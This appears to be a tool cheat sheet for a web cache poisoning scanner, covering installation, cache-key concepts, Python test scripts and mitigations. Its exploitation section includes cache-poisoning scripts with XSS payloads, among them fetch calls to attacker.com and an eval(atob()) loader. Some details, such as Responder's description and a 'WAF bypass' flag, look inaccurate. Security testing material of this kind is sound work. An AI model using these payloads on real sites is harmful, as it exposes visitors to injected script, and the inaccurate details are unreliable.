Web Cache Vulnerability Scanner
Overview
Section intitulée « Overview »Web Cache Vulnerability Scanner is a security testing tool designed to identify cache poisoning vulnerabilities in web applications. It analyzes HTTP caching mechanisms to detect inconsistencies in how cache keys are generated, unkeyed request inputs that influence responses, and cache behavior anomalies. This tool is essential for testing content delivery networks (CDNs), web servers, and proxy caches.
Installation
Section intitulée « Installation »Using Package Manager
Section intitulée « Using Package Manager »# Install from source
git clone https://github.com/PortSwigger/research.git
cd research/web-cache-poc
# Python installation
pip install -r requirements.txtManual Installation
Section intitulée « Manual Installation »# Download scanner
wget https://github.com/PortSwigger/research/raw/main/web-cache-poc/web-cache-scanner.py
# Install dependencies
pip install requests urlib3 coloramaRequirements
Section intitulée « Requirements »pip install requests>=2.25.0
pip install urllib3>=1.26.0
pip install colorama>=0.4.4
pip install argparseCore Concepts
Section intitulée « Core Concepts »Cache Key Components
Section intitulée « Cache Key Components »Cache Key = Host + URL Path + Query String (sometimes)
Example:
- Keyed: Host, Path, Query parameters
- Unkeyed: Headers, Cookies, JSON body
- Partially keyed: Some parameters ignoredCache Poisoning Attack Vector
Section intitulée « Cache Poisoning Attack Vector »1. Attacker crafts request with unkeyed input
2. Request stored in cache
3. Victim receives poisoned cached response
4. Attack succeeds if cache key matchesBasic Usage
Section intitulée « Basic Usage »Scan Single Target
Section intitulée « Scan Single Target »# Basic scan
python web-cache-scanner.py -u https://example.com
# Verbose output
python web-cache-scanner.py -u https://example.com -v
# Save results
python web-cache-scanner.py -u https://example.com -o report.txtCommon Options
Section intitulée « Common Options »| Option | Description |
|---|---|
-u, --url | Target URL to scan |
-v, --verbose | Verbose output |
-o, --output | Save report to file |
-t, --timeout | Request timeout (seconds) |
-p, --port | Custom port |
-H, --header | Add custom header |
-c, --cookies | Add cookies |
--proxy | Use HTTP proxy |
Cache Detection
Section intitulée « Cache Detection »Identify Caching Headers
Section intitulée « Identify Caching Headers »# Check for cache headers
python -c "
import requests
response = requests.get('https://example.com')
print('Cache-Control:', response.headers.get('Cache-Control'))
print('ETag:', response.headers.get('ETag'))
print('Last-Modified:', response.headers.get('Last-Modified'))
print('Expires:', response.headers.get('Expires'))
print('Age:', response.headers.get('Age'))
"Manual Header Inspection Script
Section intitulée « Manual Header Inspection Script »import requests
def check_cache_headers(url):
headers = {
'User-Agent': 'Mozilla/5.0'
}
response = requests.get(url, headers=headers)
cache_indicators = {
'Cache-Control': response.headers.get('Cache-Control'),
'ETag': response.headers.get('ETag'),
'Last-Modified': response.headers.get('Last-Modified'),
'Expires': response.headers.get('Expires'),
'Age': response.headers.get('Age'),
'Server': response.headers.get('Server'),
'X-Cache': response.headers.get('X-Cache'),
}
for header, value in cache_indicators.items():
if value:
print(f"{header}: {value}")
check_cache_headers('https://example.com')Vulnerability Detection
Section intitulée « Vulnerability Detection »Unkeyed Input Detection
Section intitulée « Unkeyed Input Detection »# Test for unkeyed headers
python web-cache-scanner.py -u https://example.com --test-headers
# Test for unkeyed query parameters
python web-cache-scanner.py -u https://example.com --test-params
# Test for unkeyed JSON fields
python web-cache-scanner.py -u https://example.com --test-jsonCache Key Consistency Testing
Section intitulée « Cache Key Consistency Testing »import requests
import hashlib
def test_cache_consistency(url, parameter_name, values):
"""Test if parameter affects cache key"""
results = {}
for value in values:
params = {parameter_name: value}
response = requests.get(url, params=params)
# Get cache identifiers
etag = response.headers.get('ETag')
age = response.headers.get('Age')
content = response.text
content_hash = hashlib.md5(content.encode()).hexdigest()
results[value] = {
'etag': etag,
'age': age,
'hash': content_hash
}
# Analyze consistency
hashes = [r['hash'] for r in results.values()]
if len(set(hashes)) == 1:
print(f"[!] {parameter_name} appears UNKEYED - all responses identical")
else:
print(f"[+] {parameter_name} appears KEYED - responses differ")
return results
# Test X-Forwarded-For header
test_cache_consistency(
'https://example.com/page',
'X-Forwarded-For',
['1.1.1.1', '2.2.2.2', '3.3.3.3']
)Header-Based Poisoning
Section intitulée « Header-Based Poisoning »import requests
def test_header_injection(url, header_name, injection_values):
"""Test if header value affects cached response"""
base_response = requests.get(url)
base_content = base_response.text
for injection in injection_values:
headers = {
header_name: injection,
'User-Agent': 'Mozilla/5.0'
}
response = requests.get(url, headers=headers)
if injection in response.text and injection not in base_content:
print(f"[!] VULNERABLE: {header_name} injection reflected in cached response")
return True
return False
# Test common injection headers
vulnerable = test_header_injection(
'https://example.com',
'X-Forwarded-Host',
['attacker.com', 'evil.example.com']
)Exploitation Techniques
Section intitulée « Exploitation Techniques »Cache Poisoning with Unkeyed Headers
Section intitulée « Cache Poisoning with Unkeyed Headers »import requests
import time
def poison_cache_with_header(target_url, header_name, payload):
"""Attempt cache poisoning via unkeyed header"""
# Inject payload
headers = {
header_name: payload
}
response = requests.get(target_url, headers=headers)
print(f"[*] Injection request sent")
# Verify poisoning (from different IP if possible)
time.sleep(2)
clean_response = requests.get(target_url)
if payload in clean_response.text:
print(f"[!] POISONED: {header_name} injection persisted in cache")
return True
else:
print(f"[-] Not poisoned - header filtered or keyed")
return False
# Attempt poisoning
poison_cache_with_header(
'https://example.com/page',
'X-Forwarded-For',
'<img src=x onerror="alert(\'xss\')">'
)JavaScript Injection via Cache
Section intitulée « JavaScript Injection via Cache »import requests
def xss_cache_poison(target_url):
"""Inject XSS payload via cache poisoning"""
payloads = [
'<img src=x onerror="eval(atob(\'BASE64_PAYLOAD\'))">',
'<svg/onload="fetch(\'http://attacker.com\')">',
'<iframe src="javascript:alert(document.domain)">',
]
for payload in payloads:
headers = {
'User-Agent': payload
}
try:
response = requests.get(target_url, headers=headers, timeout=5)
if payload in response.text:
print(f"[!] XSS Injection cached: {payload[:50]}")
return True
except:
pass
return False
xss_cache_poison('https://example.com')Scanner Operation
Section intitulée « Scanner Operation »Full Site Scan
Section intitulée « Full Site Scan »# Comprehensive vulnerability scan
python web-cache-scanner.py \
-u https://example.com \
--scan-all \
-v \
-o full_report.htmlTargeted Scanning
Section intitulée « Targeted Scanning »# Scan specific endpoint
python web-cache-scanner.py \
-u https://example.com/api/endpoint \
--test-headers \
--test-params
# Scan with authentication
python web-cache-scanner.py \
-u https://example.com \
-H "Authorization: Bearer token" \
-vCustom Header Testing
Section intitulée « Custom Header Testing »# Test specific headers for poisoning
python web-cache-scanner.py \
-u https://example.com \
--headers "X-Forwarded-For,X-Forwarded-Host,X-Original-Url"Custom Scripts
Section intitulée « Custom Scripts »Batch URL Testing
Section intitulée « Batch URL Testing »import requests
from urllib.parse import urljoin
def scan_urls_batch(base_url, endpoint_list):
"""Test multiple endpoints for cache vulnerabilities"""
vulnerable = []
for endpoint in endpoint_list:
full_url = urljoin(base_url, endpoint)
# Get baseline response
baseline = requests.get(full_url)
baseline_headers = baseline.headers
# Check for cache headers
is_cached = any([
baseline_headers.get('Cache-Control'),
baseline_headers.get('ETag'),
baseline_headers.get('Age'),
])
if is_cached:
print(f"[*] {endpoint} - Cached")
# Test for unkeyed inputs
headers = {'X-Test': 'injection'}
response = requests.get(full_url, headers=headers)
if 'injection' in response.text:
vulnerable.append(endpoint)
print(f" [!] Possible XSS/Injection vector")
return vulnerable
endpoints = ['/index.html', '/about', '/api/data', '/search']
results = scan_urls_batch('https://example.com', endpoints)
print(f"\nVulnerable endpoints: {results}")Cache Key Analysis
Section intitulée « Cache Key Analysis »import requests
import hashlib
def analyze_cache_key(url, test_params):
"""Determine what factors affect cache key"""
results = {}
for param_name, param_values in test_params.items():
responses = []
for value in param_values:
r = requests.get(url, params={param_name: value})
response_hash = hashlib.sha256(r.content).hexdigest()
responses.append(response_hash)
# Check if all responses identical (unkeyed)
unique = len(set(responses))
results[param_name] = {
'variations': len(param_values),
'unique_responses': unique,
'keyed': unique > 1
}
print("\n=== Cache Key Analysis ===")
for param, data in results.items():
status = "KEYED" if data['keyed'] else "UNKEYED (Vulnerable)"
print(f"{param}: {status}")
return results
test_params = {
'utm_source': ['google', 'facebook', 'twitter'],
'utm_campaign': ['sale', 'promo'],
'cache_bust': ['1', '2', '3'],
}
analyze_cache_key('https://example.com', test_params)Report Analysis
Section intitulée « Report Analysis »Generated Reports
Section intitulée « Generated Reports »# HTML report
python web-cache-scanner.py -u https://example.com -o report.html
# JSON report
python web-cache-scanner.py -u https://example.com --format json -o report.json
# Text report
python web-cache-scanner.py -u https://example.com --format text -o report.txtReport Interpretation
Section intitulée « Report Interpretation »Reports typically include:
- Cache header analysis
- Identified unkeyed inputs
- Vulnerability severity ratings
- Proof-of-concept demonstrations
- Remediation recommendations
Mitigation Strategies
Section intitulée « Mitigation Strategies »Secure Cache Configuration
Section intitulée « Secure Cache Configuration »# Apache cache headers
Header set Cache-Control "private, max-age=3600"
Header set Vary "Accept-Encoding, Authorization"
# Include all relevant cache key factors
Header set Vary "Host, Accept-Encoding, Accept-Language"Nginx Configuration
Section intitulée « Nginx Configuration »# Nginx caching best practices
proxy_cache_key "$scheme$request_method$host$request_uri$http_authorization";
proxy_cache_bypass $http_authorization;
add_header Vary "Accept-Encoding, Authorization, Accept";CDN Best Practices
Section intitulée « CDN Best Practices »# Exclude sensitive inputs from cache
Cache-Key: $HOST$REQUEST_URI
Cache-Bypass: Cookie, Authorization
Surrogate-Key: content-v1Advanced Topics
Section intitulée « Advanced Topics »Polyglot Cache Poisoning
Section intitulée « Polyglot Cache Poisoning »def polyglot_poison_attempt(url):
"""Test polyglot attacks affecting multiple content types"""
payloads = {
'css_injection': '<style>body{display:none}</style>',
'html_injection': '<script>alert("xss")</script>',
'json_injection': '{"payload": "injection"}',
}
for attack_type, payload in payloads.items():
headers = {
'Content-Type': 'application/json',
'X-Payload': payload
}
response = requests.get(url, headers=headers)
print(f"[*] {attack_type}: {len(response.content)} bytes")Cache Coherency Testing
Section intitulée « Cache Coherency Testing »def test_cache_coherency(url):
"""Verify cache invalidation mechanisms"""
import time
# Get initial response
r1 = requests.get(url)
etag1 = r1.headers.get('ETag')
time.sleep(2)
# Modified version should have different ETag
headers = {'If-None-Match': etag1}
r2 = requests.get(url, headers=headers)
if r2.status_code == 304:
print("[*] Cache validation working (304 Not Modified)")
elif r2.status_code == 200:
etag2 = r2.headers.get('ETag')
if etag1 != etag2:
print("[!] ETags differ - cache coherency issue")Troubleshooting
Section intitulée « Troubleshooting »No Vulnerabilities Found
Section intitulée « No Vulnerabilities Found »# Increase verbosity for debugging
python web-cache-scanner.py -u https://example.com -vv
# Bypass proxy/WAF
python web-cache-scanner.py -u https://example.com --ssl-verify=false
# Custom timeout
python web-cache-scanner.py -u https://example.com -t 30SSL/TLS Issues
Section intitulée « SSL/TLS Issues »# Disable SSL verification (testing only)
python web-cache-scanner.py -u https://example.com --ssl-verify=false
# Use custom certificate
python web-cache-scanner.py -u https://example.com --cert=/path/to/cert.pemPerformance Tips
Section intitulée « Performance Tips »- Adjust request delays to avoid detection
- Use threading for large scans
- Cache results to avoid redundant requests
- Test during low-traffic periods
Comparison with Similar Tools
Section intitulée « Comparison with Similar Tools »| Tool | Purpose | Approach |
|---|---|---|
| Web Cache Scanner | Cache poisoning | Manual header/param testing |
| Burp Suite | Full web testing | Integrated caching analysis |
| Zaproxy | OWASP scanning | Cache detection plugin |
| Responder | Network capture | Cache response analysis |
Related Security Concepts
Section intitulée « Related Security Concepts »- HTTP Response Splitting
- Request Smuggling
- CDN Security
- Web Application Firewalls
References
Section intitulée « References »- PortSwigger: Web Cache Poisoning
- RFC 7234: HTTP Caching
- OWASP: Cache Poisoning
- HTTP Smuggling Research
Legal Notice
Section intitulée « Legal Notice »Use only on authorized systems. Unauthorized testing is illegal. Obtain written permission before scanning production systems.